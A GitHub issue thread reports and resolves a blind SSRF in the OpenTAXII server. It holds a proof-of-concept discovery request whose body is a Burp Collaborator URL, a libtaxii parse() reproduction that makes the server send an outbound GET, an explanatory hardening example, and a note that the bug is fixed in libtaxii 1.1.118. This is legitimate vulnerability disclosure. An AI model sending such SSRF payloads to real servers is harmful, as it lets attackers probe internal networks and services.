eclecticiq / OpenTAXII

TAXII server implementation in Python from EclecticIQ
BSD 3-Clause "New" or "Revised" License
189 stars 89 forks

Blind SSRF in OpenTaxii #176

Closed 0wa1s closed 3 years ago

0wa1s commented 3 years ago

Hi,

My colleague (Vijay Kota) and I were testing a locally deployed OpenTaxii instance and found that it is vulnerable to an SSRF issue, which can be exploited by adding http://?

Sample POC:

POST /services/discovery HTTP/1.1
Host: 127.0.0.1:9000
Connection: close
Accept-Encoding: gzip, deflate
Accept: application/xml
User-Agent: Cabby 0.1.20
X-TAXII-Accept: urn:taxii.mitre.org:message:xml:1.1
X-TAXII-Services: urn:taxii.mitre.org:services:1.1
X-TAXII-Content-Type: urn:taxii.mitre.org:message:xml:1.1
X-TAXII-Protocol: urn:taxii.mitre.org:protocol:https:1.0
Content-Type: application/xml
Content-Length: 339

http://ig2vjheeqdul2zwfbfxo31ngk7qxem.burpcollaborator.net?


traut commented 3 years ago

@0wa1s thank you for this awesome find!

I've reproduced the issue and narrowed it down to libtaxii's parse method. Executing

from libtaxii.common import parse
# the string is passed straight through to the XML parser as a source location
parse("http://test-domain.local?junkdata")

will trigger a GET request to http://test-domain.local?junkdata

The call to parse() happens during validation of the message. In my tests it does not get remediated by calling configure_libtaxii_xml_parser before calling validation.

I've made an issue for the libtaxii project
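The location-versus-content confusion behind the finding, as an added example that is not libtaxii's or OpenTAXII's code: libtaxii hands its argument to lxml's etree.parse(), which accepts a filename or URL as well as a file object, so a body that is a bare URL is fetched. To stay offline this uses the stdlib ElementTree, whose parse() has the same split (a string is opened as a path rather than a URL), which is enough to show the bug class and the fix; the sample inputs are constructed.

```python
"""Why untrusted text handed to a parser's source argument can become a request."""
import io
import xml.etree.ElementTree as ET

# Constructed sample inputs: a minimal request-like document, and the kind of
# string the issue used (a bare URL where an XML document was expected).
GOOD_XML = b'<Discovery_Request message_id="1"/>'
URL_STRING = "http://test-domain.local?junkdata"


def parse_naive(source):
    """Mirrors the vulnerable pattern: the argument goes to a parser entry
    point that treats a plain string as a *location* to open. With lxml that
    location may be an http:// URL and is fetched, which is the SSRF."""
    return ET.parse(source).getroot()


def parse_untrusted(data):
    """Hardened form: force the input to be parsed as document *content*.
    Bytes or str are wrapped in a BytesIO, so no parser can interpret them
    as a path or URL. A parser that forbids DTDs/entities is the next layer."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    if not isinstance(data, (bytes, bytearray)):
        raise TypeError("untrusted XML must be supplied as bytes or str")
    return ET.parse(io.BytesIO(data)).getroot()


def classify(fn, source):
    """Report how a parser entry point reacted to `source`:
    'parsed', 'treated-as-location' (it tried to open/fetch the string)
    or 'rejected' (it read the string as content and found it is not XML)."""
    try:
        fn(source)
        return "parsed"
    except OSError:  # FileNotFoundError etc.: the string was used as a location
        return "treated-as-location"
    except ET.ParseError:  # the string was parsed as content and rejected
        return "rejected"


if __name__ == "__main__":
    print("naive   :", classify(parse_naive, URL_STRING))      # treated-as-location
    print("hardened:", classify(parse_untrusted, URL_STRING))  # rejected
```

The same classifier run against libtaxii's parse() on the affected version would report the URL string as treated-as-location, which is the behaviour the outbound GET above confirms.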

emmanvg commented 3 years ago

A fix has been made available in version 1.1.118

ghost commented 3 years ago

Confirmative, fixed in libtaxii>=1.1.118. https://github.com/TAXIIProject/libtaxii/issues/246

Thank you all :)